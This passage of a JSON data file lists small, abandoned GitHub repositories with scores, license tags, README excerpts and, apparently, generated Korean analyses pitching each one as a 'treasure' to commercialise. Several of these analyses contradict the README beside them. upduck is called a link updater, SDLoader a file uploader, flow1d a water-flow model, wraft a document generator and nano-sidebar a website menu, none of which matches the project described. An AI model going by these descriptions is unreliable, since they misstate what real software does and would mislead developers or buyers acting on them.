uses\n[`go-containerregistry`","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"rougier/nano-sidebar","github_url":"https://github.com/rougier/nano-sidebar","stars":8,"language":"Emacs Lisp","license":"GPL-3.0","abandonment_months":58,"description":"# nano-sidebar 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 옆쪽 메뉴를 간단하고 가볍게 만들어주는 도구로, 누구나 쉽게 사용할 수 있는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 문서 편집 도구(구글 문서처럼)에서 좌측 네비게이션 메뉴로 활용\n- **내부 업무 도구**: 회사 직원들이 사용하는 관리 시","readme_excerpt":"## GNU Emacs / N Λ N O sidebar\n\nThis package allows to have configurable sidebars on a per frame basis.\n\n### Installation\n\nInstall with [straight.el](https://github.com/raxod502/straight.el):\n\n```\n(straight-use-package '(nano-sidebar :type git :host github\n                                     :repo \"rougier/nano-sidebar\"))\n```\n\n... or install with [`quelpa`](https://github.com/quelpa/quelpa):\n\n```emacs-lisp\n(use-package nano-sidebar\n  :ensure nil\n  :defer t\n  :quelpa (nano-sidebar\n           :fetcher github\n           :repo \"rougier/nano-sidebar\"))\n```\n\n### Usage\n\nIt is possible to use the sidebar without any configuration\n\n```emacs-lisp\n(require 'nano-sidebar)\n\n(nano-sidebar-toggle)\n```\n\nIn such case, a sidebar with default values is created and the default\ninit function is called.\n\nYou can also configure sidebars individually by first naming your frame\nand then provide a specific configuration:\n\n```emacs-lisp\n(defun nano-sidebar-mu4e-init (frame sidebar)\n  (select-frame sidebar)\n  (d","composite_score":0.5004,"license_safety_tag":"restricted"},{"name":"uzzal2k5/devops","github_url":"https://github.com/uzzal2k5/devops","stars":6,"language":"CSS","license":"MIT","abandonment_months":53,"description":"# uzzal2k5/devops 저장소 분석\n\n## 왜 보물인가\n서버와 IT 인프라를 자동으로 관리하는 도구 모음으로, 기업의 IT 운영 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 DevOps 플랫폼으로 중소기업에 자동화된 서버 관리 서비스 제공\n2. **내부 업무 도구**: 자사 IT팀이","readme_excerpt":"# DevOps Course ( Free )\nDevOps Free Course For Freshers. This is an open course and anybody can join the session.\n\n# Session Schedule \nEvery Sunday at 9:00 PM BST (GMT+6)\n\n# Join Zoom Meeting \n [Join Live Session]( https://us04web.zoom.us/j/8899609070?pwd=VzlLUWY3RENsdWpyUVQrOTduZGcwUT09)\n\n\n  Meeting ID: 889 960 9070\n  \n  Passcode: devopsgrp\n\n# Get Live Session video, Visit Youtube Channel\nSubscribe [DevOps Bangladesh]( https://www.youtube.com/channel/UC9FdZxqfZKkezot3wOkf1CQ)\n\n# Facebook Group\n[Join DevOps Bangladesh](https://www.facebook.com/groups/devopsgrp)\n\n\n# Course Outline\n\n  - DevOps Tools Overview\n  - [ Git Repository ](./github/github.md)\n  - [ Ansible ](./ansible/README.md)\n  - CICD : Jenkins\n  - Nexus Artifactory \n  - Docker & Kubernetes\n  - AWS Cloud\n  - Terraform\n  - Python Scripting\n  - Bash Scripting\n  - Groovy\n  - Monitoring( Nagios/Prometheus)\n  - Automation Selenium / JMeter\n  - Reverse Proxy (Nginx)\n  - SQL (MySQL)\n  - Vagrant\n  - Random Project Works\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"xarantolus/upduck","github_url":"https://github.com/xarantolus/upduck","stars":22,"language":"Go","license":"MIT","abandonment_months":57,"description":"# upduck 저장소 분석\n\n## 왜 보물인가\n오래된 웹 링크들을 자동으로 최신 주소로 업데이트해주는 도구로, 인터넷 자산을 관리하는 데 드는 수작업 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **링크 관리 SaaS**: 기업이나 개인이 자신의 웹사이트, 블로그, 문서에 있는 깨진 링크를 자동으로 찾아 수정해주는 구독형 서비스\n2. ","readme_excerpt":"# upduck\nUpduck is a simple HTTP and HTTPS static file server that integrates with [DuckDNS](https://www.duckdns.org/). It is meant for quickly sharing static files beyond your local network over an HTTPS connection but can also be used within your local network (without HTTPS).\n\n**Disclaimer**: This project has no affiliation with DuckDNS or Let's Encrypt and is not endorsed or supported by them.\n\n**Disclaimer**: Using this program with the `-email` flag signifies your acceptance to the [Let's Encrypt's Subscriber Agreement and/or Terms of Service](https://letsencrypt.org/repository/).\n\n### How to use\nThe help section of the program tries to be as helpful as possible, make sure you read the section with examples:\n\n```\n$ upduck -h\nupduck, a simple HTTP and HTTPs file server\n\nCommand-line flags:\n  -dir string\n    \tDirectory that should be served (default \".\")\n  -disallow-listings\n    \tDisable directory listings and downloads\n  -email string\n    \tEmail sent to LetsEncrypt for certificate","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"sandipdhagdi/SDLoader","github_url":"https://github.com/sandipdhagdi/SDLoader","stars":7,"language":"Shell","license":"MIT","abandonment_months":103,"description":"# SDLoader 상품화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 파일을 빠르고 안전하게 업로드할 수 있게 해주는 기술로, 모든 온라인 서비스에서 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 저장소(드라이브) 서비스에서 사용자의 사진, 문서 업로드 기능 제공\n- **내부 업무 도구**: 회사 직원들이 보고서, ","readme_excerpt":"# SDLoader\n\n[![CI Status](http://img.shields.io/travis/sandipdhagdi@gmail.com/SDLoader.svg?style=flat)](https://travis-ci.org/sandipdhagdi@gmail.com/SDLoader)\n[![Version](https://img.shields.io/cocoapods/v/SDLoader.svg?style=flat)](http://cocoapods.org/pods/SDLoader)\n[![License](https://img.shields.io/cocoapods/l/SDLoader.svg?style=flat)](http://cocoapods.org/pods/SDLoader)\n[![Platform](https://img.shields.io/cocoapods/p/SDLoader.svg?style=flat)](http://cocoapods.org/pods/SDLoader)\n\n\n`SDLoader` is easy to use and customisable HUD for showing ongoing activity for iPhone and iPad iOS devices.\n\n## Demo\n\n![SDLoaders1](https://github.com/sandipdhagdi/SDLoader/blob/master/SampleVideos/s1.gif)\n![SDLoaders2](https://github.com/sandipdhagdi/SDLoader/blob/master/SampleVideos/s2.gif)\n![SDLoaders3](https://github.com/sandipdhagdi/SDLoader/blob/master/SampleVideos/s3.gif)\n![SDLoaders4](https://github.com/sandipdhagdi/SDLoader/blob/master/SampleVideos/s4.gif)\n\n## Example\n\nTo run the example project,","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"Pierre2tm/unusable_player","github_url":"https://github.com/Pierre2tm/unusable_player","stars":9,"language":"Dart","license":"NOASSERTION","abandonment_months":42,"description":"# Pierre2tm/unusable_player 상용화 분석\n\n## 왜 보물인가\n사용하기 어려운 동영상 재생 기술을 단순하고 실용적으로 만든 도구로, 많은 개발자들이 겪는 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 편집 SaaS**: 웹 기반 영상 편집 도구에 안정적인 재생 기능 탑재\n2. **온라인 교육 플랫폼 내부 도구**: 강의 ","readme_excerpt":"# unusable_player\nUnusable Player is a flutter music player based on just_audio package.\nIt's a portfolio project, it's not meant to be used in real life.\nIts focuses on visuals instead of usability and performance, that's why the project is called \"Unusable Player\".\n\n### ⚠️ Caution\nThis is an old project that isn't representative of my actual coding standards.\nIf you take inspiration from this source code, keep a critical eye. Some parts of this project are better than others.\nHere are some ideas for improvements:\n- Use Bloc instead of GetX\n- Use a feature-based project organization\n- Re-write the animations widgets\n- Rethink the overall songs discovery and player architecture.\n\n### Some views of the project:\n![showcase_1](readme/up_showcase_1.jpg)\n![showcase_1](readme/up_showcase_2.jpg)\n\n### This project takes inspiration from Sulton Handaya's artwork:\n![artwork](readme/original_artwork_by_sulton_handaya.webp)\n\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"robpike/expr","github_url":"https://github.com/robpike/expr","stars":7,"language":"Go","license":"NOASSERTION","abandonment_months":57,"description":"# robpike/expr 프로젝트 평가\n\n## 왜 보물인가\n수식과 조건문을 자동으로 계산해주는 엔진으로, 복잡한 규칙을 코딩 없이 설정할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **가격 책정 SaaS**: 고객마다 다른 할인 규칙이나 요금 계산을 관리자가 직접 수정 가능하게 제공\n2. **업무 자동화 도구**: 회사 내부에서 승인 기준이나 데","readme_excerpt":"The expr package provides a simple evaluator for arithmetic integer\nexpressions. The syntax and operations are the same as in Go. Operands are\nthe native \"int\" type, except that unlike in Go, boolean values, which are\ncreated by comparisons, are integer 1 (true) and 0 (false). Create a parsed\nexpression using Parse, and then evaluate it with Eval.\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"cherscarlett/pay-transparency-survey","github_url":"https://github.com/cherscarlett/pay-transparency-survey","stars":10,"language":"","license":"CC0-1.0","abandonment_months":40,"description":"# Pay Transparency Survey 저장소 분석\n\n## 왜 보물인가\n급여 공개 운동이 확산되는 시대에 직원들의 임금 현황을 투명하게 수집·분석할 수 있는 기초 데이터셋입니다.\n\n## 어디에 쓸 수 있나\n1. **급여 비교 웹사이트**: 직업군별 평균 급여를 비교할 수 있는 서비스로 구직자에게 판매\n2. **HR 분석 도구**: 기업의 임금 격차 ","readme_excerpt":"# Pay Transparency Survey\nA pay transparency survey to help enable fair and equitable wages via employee organization.\n\nDesigned and written with ❤️ by Cher Scarlett August 2021\n\n*I suggest password protecting your survey to protect the integrity of the data collected. I do not suggest hosting it on your company's servers.*\n\n*It can also be helpful to gather former employee data from folks who left the company within the most recent year.*\n\n1. **What is your current or most recent base annual salary?** *(required)*\\\n&nbsp;&nbsp;*Enter the numerical cash value in [YOUR CURRENCY] only.*\\\n&nbsp;&nbsp;*Do NOT include any RSU vests, cash bonuses, or commissions.*\\\n&nbsp;&nbsp;*If you are paid hourly, please convert to annual salary by multiplying your hourly wage by 40, and again by 52. (40 hours a week, 52 weeks a year)* \n\n2. **Do you receive a portion of your income in the form of commissions?** *(required)*\\\n&nbsp;&nbsp;*A commission is a fee paid based on a percentage of sales made by a","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"EdwardLiBowei/shopee-mall","github_url":"https://github.com/EdwardLiBowei/shopee-mall","stars":19,"language":"Java","license":"Apache-2.0","abandonment_months":47,"description":"# Shopee Mall 저장소 분석\n\n## 왜 보물인가\n쇼핑몰 운영에 필요한 기본 시스템을 직접 만들 수 있는 오픈소스 코드로, 플랫폼 개발 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 상인들을 위한 월간 구독형 온라인 쇼핑몰 호스팅 서비스\n2. **내부 업무 도구**: 대형 유통사의 자사 상품 판매 시","readme_excerpt":"# shopee-mall","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"egoist/vite-plugin-remove-exports","github_url":"https://github.com/egoist/vite-plugin-remove-exports","stars":17,"language":"TypeScript","license":"MIT","abandonment_months":43,"description":"# vite-plugin-remove-exports 상품화 분석\n\n## 왜 보물인가\n웹 개발자들이 공개하고 싶지 않은 내부 함수를 자동으로 숨길 수 있는 도구로, 소프트웨어 보안과 지적재산권 보호에 직접적으로 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (컴포넌트 라이브러리 회사)**\n웹 디자인 시스템을 판매하는 기업이 고객에게 공","readme_excerpt":"**💛 You can help the author become a full-time open-source maintainer by [sponsoring him on GitHub](https://github.com/sponsors/egoist).**\n\n---\n\n# vite-plugin-remove-exports\n\n[![npm version](https://badgen.net/npm/v/vite-plugin-remove-exports)](https://npm.im/vite-plugin-remove-exports) [![npm downloads](https://badgen.net/npm/dm/vite-plugin-remove-exports)](https://npm.im/vite-plugin-remove-exports)\n\n## Use Case\n\nIt's useful if you want to implement something like Next.js' `getServerSideProps` or the `loader` function from Remix.js. This is done by creating a proxy of your code with the exports you specfied excluded and using esbuild to bundle the proxy code in order to eliminate unneeded exports.\n\nDespite that we added an extra step to the build process, the plugin is still very fast due the how fast esbuild is.\n\n## Install\n\n```bash\nnpm i vite-plugin-remove-exports\n```\n\n## Usage\n\n`vite.config.ts`:\n\n```ts\nexport default {\n  plugins: [\n    removeExports({\n      match() {\n        return","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"kunzhan/SDSNE","github_url":"https://github.com/kunzhan/SDSNE","stars":14,"language":"Python","license":"unknown","abandonment_months":54,"description":"# kunzhan/SDSNE 분석 보고서\n\n## 왜 보물인가\n고차원 데이터를 시각화하는 기술로, 복잡한 데이터 패턴을 누구나 이해할 수 있는 그림으로 변환할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업의 고객 행동 데이터를 한눈에 보이는 대시보드로 제공하는 서비스\n2. **의료 진단 도구**: 의료 영상이나 검사 결과를","readme_excerpt":"# Stationary Diffusion State Neural Estimation\nAlthough many graph-based clustering methods attempt to model the stationary diffusion state in their objectives, using a predefined graph limits their performance. We argue that the estimation of the stationary diffusion state can be achieved by gradient descent over neural networks. We specifically design the Stationary Diffusion State Neural Estimation (SDSNE) to exploit multiview structural graph information for co-supervised learning. We explore how to design a graph neural network specially for unsupervised multiview learning and integrate multiple graphs into a unified consensus graph by a shared self-attentional module. The view-shared self-attentional module utilizes the graph structure to learn a view-consistent global graph. Meanwhile, instead of using auto-encoder in most unsupervised learning graph neural networks, SDSNE uses a co-supervised strategy with structure information to supervise the model learning. The co-supervised","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"shosti/wraft","github_url":"https://github.com/shosti/wraft","stars":12,"language":"Rust","license":"Apache-2.0","abandonment_months":55,"description":"# Wraft 저장소 분석\n\n## 왜 보물인가\n텍스트나 문서를 자동으로 만들고 관리할 수 있는 도구로, 반복적인 문서 작업을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 계약서, 제안서, 보고서를 자동 생성해주는 클라우드 기반 문서 작성 플랫폼\n2. **내부 업무 도구**: 회사 내부에서 HR 인사 양식, 법무 계약","readme_excerpt":"# WRaft: Raft in WebAssembly\n\n## What is this?\n\nA toy implementation of the [Raft Consensus Algorithm](https://raft.github.io/)\nfor [WebAssembly](https://webassembly.org/), written in Rust. Basically, it\nsynchronizes state across three browser windows in a peer-to-peer fashion.\n\n## Why is this?\n\nBecause I was curious to see if I could get it to work 😄. I can't think of any\nreal-world use-cases off the top of my head, but if you can, please open an\nissue and let me know!\n\n## How does it work?\n\nWRaft uses [WebRTC data\nchannels](https://webrtc.org/getting-started/data-channels) to set up\ncommunication between the browser windows. Sadly [WebRTC isn't purely\npeer-to-peer](https://www.youtube.com/watch?v=Y1mx7cx6ckI), so there's a\nseparate WebSocket-based service (`webrtc-introducer`) that \"introduces\" the\nbrowser windows to each other before the cluster can start. The browser windows\ncan be on the same computer or different machines on a LAN (or different\nnetworks, theoretically, but I have","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"wongzeon/query_covid19_vaccine_shenzhen","github_url":"https://github.com/wongzeon/query_covid19_vaccine_shenzhen","stars":8,"language":"Python","license":"unknown","abandonment_months":56,"description":"# 심천 COVID-19 백신 조회 시스템 분석\n\n## 왜 보물인가\n공공 보건 데이터를 실시간으로 조회할 수 있는 자동화 도구로, 백신 접종 정보가 필요한 시민과 기관들에게 즉각적인 정보 접근을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 백신 예약 알림 플랫폼 - 사용자가 근처 보건소의 백신 여부를 자동으로 확인하고 알림받는 서비","readme_excerpt":"# query_covid19_vaccine_shenzhen\n通过“深圳疾控”公众号查询新冠疫苗供应情况，并将可以预约的社康信息推送至微信。\n\n❗ 2021-6-4 各类参数已做加密，项目已失效。\n\n# 一起苗苗苗苗苗！\n虽然中国面对新冠疫情已经处理得很好了，现阶段没打疫苗的，想打的应当尽早，这样才安全。\n\n碍于不能总是盯着手机看放号情况，便写了这个简单的程序，让它定时执行并汇报至微信，可预约时就快速进行预约。\n\n![zx2.png](http://ww1.sinaimg.cn/large/001NakGngy1gr0sdqczx3j60gp0c1dg602.jpg)\n\n🔺 Stock 信息不是真实库存，只是状态信息。\n\n获取到可预约的社康depaId（社康ID），可通过社康编号Get网址，获得真实库存信息。\n\n`https://xgsz.szcdc.net/crmobile/reservationStock/timeNumber?depaId=社康编号&date=2021-06-01&vaccCode=5601`\n\nrestSum是总库存，restSurplus则是剩余库存，选择后提交即可。\n\ntips：有可预约的时候，在选择时间的时候，也可能被预约完了，所以下手要快一些~\n\n# 使用条件\n✅ 关注 `深圳疾控` 微信公众号，并建立个人档案；\n\n✅ 电脑端安装Fiddler或其他的抓包工具，并登录PC微信，打开Fiddler后，打开疫苗预约页面，完成登录抓包。\n\n✅ 抓包后，请将程序内的`抓包获取`替换成对应参数，实测仅需抓如下两个链接：\n\n得到Cookie和Header中的token\n`https://imm.szcdc.net//miWeixin/?appId=XXXXX`\n\n获得POST传送的数据\n`https://imm.szcdc.net/miWeixin/wx/reservation/getReservationAddr`\n\n✅ Python版本 >= 3.6，需要requests库，没有的请执行 `pip install requests`\n\n✅ 注册企业微信，并新建一个应用，获取其编号和secret。[官方文档](https://work.weixin.qq.com/api/doc/90000/90135/90236#%E6%96%87%E6%","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"josephmate/OdinCodeBrowser","github_url":"https://github.com/josephmate/OdinCodeBrowser","stars":19,"language":"Java","license":"Apache-2.0","abandonment_months":45,"description":"# OdinCodeBrowser 상품화 분석\n\n## 왜 보물인가\n프로그래머들이 복잡한 코드를 빠르게 이해하고 탐색할 수 있도록 돕는 브라우징 도구로, 코드 읽기 시간을 대폭 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 코드 분석 SaaS**\n- 신입 개발자의 온보딩 속도를 높이고 코드 검토 시간을 단축하는 업무용 구독 서비스\n\n**2","readme_excerpt":"# Odin Code Browser\n\nThis project attempts to create a completely static website of your source code,\nthat navigates all the way down to the depths of the JDK.\nThe goal is to navigate as well as Intellij.\nTry it yourself by navigating from\n[Apache Commons Text's\nStringEscapeUtils](https://josephmate.github.io/OdinCodeBrowserRepos/commons-text_1.9/org/apache/commons/text/StringEscapeUtils.html#linenum38).\n\n# Motivation\nI used \n[grepcode](https://web.archive.org/web/20150318024036/http://www.grepcode.com/)\nat least once a week and I am sad to see it go.\nIt's navigation was almost as good as an IDE.\nYou could navigate from apache commons all the way down to the JDK.\nOccasionally, I would forget what I was originally doing and get lost in the depths of the JDK.\nI hope that I can create a spiritual successor by using this tool,\nthat will live much longer since the source code is available,\nand the resulting static web pages are decentralized.\n\n# Design Philosophy \n1. Each page is static\n2. ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"haofeixu/flow1d","github_url":"https://github.com/haofeixu/flow1d","stars":9,"language":"Python","license":"MIT","abandonment_months":43,"description":"# haofeixu/flow1d 분석\n\n## 왜 보물인가\n물의 흐름을 정확하게 계산하는 도구로, 댐·하수도·강 관리가 필요한 인프라 분야에서 매우 실용적입니다.\n\n## 어디에 쓸 수 있나\n1. **수자원 관리 SaaS**: 지자체·수도권광역청이 월 구독으로 사용하는 홍수 예측·댐 운영 관리 플랫폼\n2. **엔지니어링 컨설팅 내부 도구**: 건설사·설계사가 ","readme_excerpt":"# Flow1D\n\nOfficial PyTorch implementation of paper:\n\n[**High-Resolution Optical Flow from 1D Attention and Correlation**](https://arxiv.org/abs/2104.13918), **ICCV 2021, Oral**\n\nAuthors: [Haofei Xu](https://haofeixu.github.io/), [Jiaolong Yang](https://jlyang.org/), [Jianfei Cai](https://jianfei-cai.github.io/), [Juyong Zhang](http://staff.ustc.edu.cn/~juyong/), [Xin Tong](https://scholar.google.com/citations?user=P91a-UQAAAAJ&hl=en&oi=ao)\n\n**11/15/2022 Update: Check out our new work: [Unifying Flow, Stereo and Depth Estimation](https://haofeixu.github.io/unimatch/) and code: [unimatch](https://github.com/autonomousvision/unimatch) for estimating optical flow with our new GMFlow model. [9 pretrained GMFlow models](https://github.com/autonomousvision/unimatch/blob/master/MODEL_ZOO.md) with different speed-accuray trade-offs are also released. Check out our [Colab](https://colab.research.google.com/drive/1r5m-xVy3Kw60U-m5VB-aQ98oqqg_6cab?usp=sharing) and [HuggingFace](https://huggingface","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"kaveai/kave_summarify","github_url":"https://github.com/kaveai/kave_summarify","stars":12,"language":"HTML","license":"MIT","abandonment_months":42,"description":"# kaveai/kave_summarify 분석\n\n## 왜 보물인가\n긴 영상이나 문서를 자동으로 요약해주는 AI 도구로, 바쁜 사람들이 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 뉴스레터 구독자들을 위해 하루 뉴스 기사들을 자동으로 요약해서 메일로 보내주는 서비스\n2. **내부 업무 도구**: 회사 내 회의 영상","readme_excerpt":"# ka-ve_summarify\n\n## Takım Üyeleri\n\n- Yunus Emre Gündoğmuş [@yemregundogmus](https://github.com/yemregundogmus)\n- Feyza Zeynep Salam [@feyzazeynep](https://github.com/feyzazeynep)\n- Emre Yüksel [@emreeyukseel](https://github.com/emreeyukseel)\n- Büşra Gökmen [@newsteps8](https://github.com/newsteps8)\n- Hasan Kemik [@eruimdas](https://github.com/Eruimdas)\n\n## Kullanım\n## Türkçe Metin Özetleme ve Ka|Ve Stemmer\n### Gerekli Kütüphaneler\n\n```python\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus import stopwords\nimport heapq\nfrom gensim.summarization import keywords\nfrom nltk import sent_tokenize\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom gensim.models import KeyedVectors\nimport networkx as nx\nimport re\nimport numpy as np\nimport json\nimport pickle\nfrom keras.models import model_from_json\nfrom keras.models import load_model\nimport Extraction_Based_Text_Summarization\n```\n\nYukarıdaki kütüphaneleri programınıza ekledikten sonra,\n\n```python\nex_sum = extraction_based_sum(","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"fossasia/eventyay-artwork","github_url":"https://github.com/fossasia/eventyay-artwork","stars":12,"language":"","license":"Apache-2.0","abandonment_months":28,"description":"# fossasia/eventyay-artwork 상용화 분석\n\n## 왜 보물인가\n행사나 축제를 열 때 필요한 포스터, 배너 같은 홍보물을 쉽게 만들 수 있는 디자인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 행사 주최자들이 월 구독으로 전문적인 행사 포스터·초대장을 직접 만드는 온라인 플랫폼\n2. **내부 업무 도구*","readme_excerpt":"# eventyay artwork\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"TheRawMeatball/meme-cli","github_url":"https://github.com/TheRawMeatball/meme-cli","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":49,"description":"# meme-cli 상용화 분석\n\n## 왜 보물인가\n인터넷 밈(이미지 글귀)을 명령어로 빠르게 만들 수 있는 도구로, 콘텐츠 제작자들이 수작업 대신 자동화로 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 관리 SaaS**: 마케팅팀이 대량의 밈을 빠르게 생성해 SNS에 올리는 서비스\n2. **내부 업무 도구**: 회사 커뮤니케","readme_excerpt":"# meme-cli\n\nA command line utility to easily make dank memes.\n\nYes, really.\n\n## Installation\n\n```sh\ncargo install meme-cli\n```\n\nAlternatively, install from source using\n\n```sh\ngit clone https://github.com/TheRawMeatball/meme-cli\ncd meme-cli\ncargo install --path .\n```\n\nAn AUR package is also planned\n\n## Usage Example\n\n```sh\n# make sure to update your sources after installation, and then again regularly \nmeme-cli update-sources\nmeme-cli generate gru-plan \"make memecli\" \"get it working enough to release it\" \"you need to write a readme\" \"you need to write a readme\"\n```\n\nwill generate the following meme, and put it on your clipboard to easily share it:\n\n![(the meme you generated)](resources/example.png)\n\nNote: if you don't get the meme on your clipboard, you might need to install a clipboard manager or enable image support on your clipboard manager.\n\n## Tips and tricks\n\nYou can run `meme-cli generate-proto-completions` to generate some rough completion scripts for your preferred shell. You ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"WangYves/sanic","github_url":"https://github.com/WangYves/sanic","stars":17,"language":"Python","license":"MIT","abandonment_months":103,"description":"# WangYves/sanic 프로젝트 분석\n\n## 왜 보물인가\n빠르고 가벼운 웹 서버를 만들기 위한 기초 도구로, 작은 회사나 스타트업에서 저비용으로 빠른 서비스 구축이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업의 업무 관리 클라우드 소프트웨어(회계, 일정 관리 등)의 핵심 엔진\n2. **내부 업무 도구**: 제조업체","readme_excerpt":"Sanic\n=====\n\n|Join the chat at https://gitter.im/sanic-python/Lobby| |Build Status| |PyPI| |PyPI version|\n\nSanic is a Flask-like Python 3.5+ web server that's written to go fast.  It's based on the work done by the amazing folks at magicstack, and was inspired by `this article <https://magic.io/blog/uvloop-blazing-fast-python-networking/>`_.\n\nOn top of being Flask-like, Sanic supports async request handlers.  This means you can use the new shiny async/await syntax from Python 3.5, making your code non-blocking and speedy.\n\nSanic is developed `on GitHub <https://github.com/channelcat/sanic/>`_. Contributions are welcome!\n\nIf you have a project that utilizes Sanic make sure to comment on the `issue <https://github.com/channelcat/sanic/issues/396>`_ that we use to track those projects!\n\nHello World Example\n-------------------\n\n.. code:: python\n\n    from sanic import Sanic\n    from sanic.response import json\n\n    app = Sanic()\n\n    @app.route(\"/\")\n    async def test(request):\n        retur","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"novus-package-manager/novus","github_url":"https://github.com/novus-package-manager/novus","stars":16,"language":"Rust","license":"Apache-2.0","abandonment_months":55,"description":"# Novus Package Manager 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 필요한 코드 부품들을 쉽게 찾고 관리할 수 있는 새로운 방식을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자용 통합 개발 플랫폼 - 코드 라이브러리 검색·설치·버전 관리를 한 곳에서 처리하는 웹 서비스\n2. **내부 업무 도구**: 기업","readme_excerpt":"# Novus\nA blazingly fast and futuristic package manager for windows.\n\n# Why Novus\n\n### Fast\n\nUsing Novus, you can install packages using multiple threads, making it around 8 times faster than normal downloads.\n\n### Silent Installations\n\nNovus installs apps silently, in a manner such that users don't need to accept any prompts during the installation.\n\n### Non-Admin Installations\n\nNovus supports non-admin installations. You don't have to go through the effort of opening a separate admin terminal.\n\n### Portable Installations\n\nNovus supports the installation of portable packages.\n\n### Open Source\n\nNovus is open-source, making it easier to contribute and add packages to the manifest.\n\n### Package Manifests\n\nAll of Novus's packages are updated and monitored daily, using a fail-safe auto-updating script.\n\n# Difference from Chocolatey\n\n### Speed\n\nNovus is significantly faster than chocolatey due to it's multithreaded nature.\n\n<img src=\"https://i.imgur.com/wSj375R.png\" />\n\n### Non-Admin Instal","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"best-of-acrv/toposlam","github_url":"https://github.com/best-of-acrv/toposlam","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":59,"description":"# TopoSLAM 저장소 분석\n\n## 왜 보물인가\n로봇이나 드론이 자신의 위치를 파악하고 지도를 만드는 핵심 기술로, 자율주행차·배송로봇·실내 드론 등 자동화 산업의 기초가 됩니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행 로봇 SaaS**: 물류 회사에 로봇 배송 서비스를 제공할 때 위치 인식 기술 탑재\n2. **드론 자동 비행 API**: 건설사나","readme_excerpt":"# Introduction\n\nThis repo implements a topological SLAM system. \nDeep Visual Odometry ([DF-VO](https://github.com/Huangying-Zhan/DF-VO)) and [Visual Place Recognition](https://github.com/dadung/Visual-Localization-Filtering) are \ncombined to form the topological SLAM system.\n\n## Publications\n\n1. [Visual Odometry Revisited: What Should Be Learnt? \n](https://arxiv.org/abs/1909.09803) \n\n2. [DF-VO: What Should Be Learnt for Visual Odometry?\n](https://arxiv.org/abs/2103.00933) \n\n3. [Scalable Place Recognition Under Appearance Change for Autonomous Driving](https://openaccess.thecvf.com/content_ICCV_2019/html/Doan_Scalable_Place_Recognition_Under_Appearance_Change_for_Autonomous_Driving_ICCV_2019_paper.html)\n\n\n```\n@INPROCEEDINGS{zhan2019dfvo,\n  author={H. {Zhan} and C. S. {Weerasekera} and J. -W. {Bian} and I. {Reid}},\n  booktitle={2020 IEEE International Conference on Robotics and Automation (ICRA)}, \n  title={Visual Odometry Revisited: What Should Be Learnt?}, \n  year={2020},\n  volume={},\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"kim-yeon-gyu-exlock/fastdj","github_url":"https://github.com/kim-yeon-gyu-exlock/fastdj","stars":7,"language":"Python","license":"MIT","abandonment_months":76,"description":"# FastDJ 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 빠르게 구축할 수 있는 기초 틀을 제공하여, 개발자들이 반복되는 작업 없이 핵심 기능 개발에만 집중할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 팀 협업 도구(프로젝트 관리, 일정 공유)의 백엔드 기반으로 사용\n- **내부 업무 도구**: 중소기업의 사원 관","readme_excerpt":"[한국어 README](https://github.com/code-yeongyu/fastdj/blob/master/README_ko.md)\n\n- Currently working on finish writing English README, please checkout Korean README to understand the full concept.\n\n# What is FastDJ\n\nFastDJ is a simple script that helps you to create your restful api django backend project easily.  \nWhat you do with djangorestframework is pretty limited, therefore FastDJ offers some templates to do them quickly, and you can use them just with some modify at the settings file.  \nYou need to use python3 or later and the django 2.0 or later to use this script.\n\n# What FastDJ offers\n\n- making models\n- automatically setting up virtualenv\n- automatically installing required pip modules (django, djangorestframework, django-cors-headers)\n- easier setups in settings.py ( simplify the setups about timezone, adding django_apps, restframework settings and cors-headers settings )\n- setting up serializers\n- making custom user model with 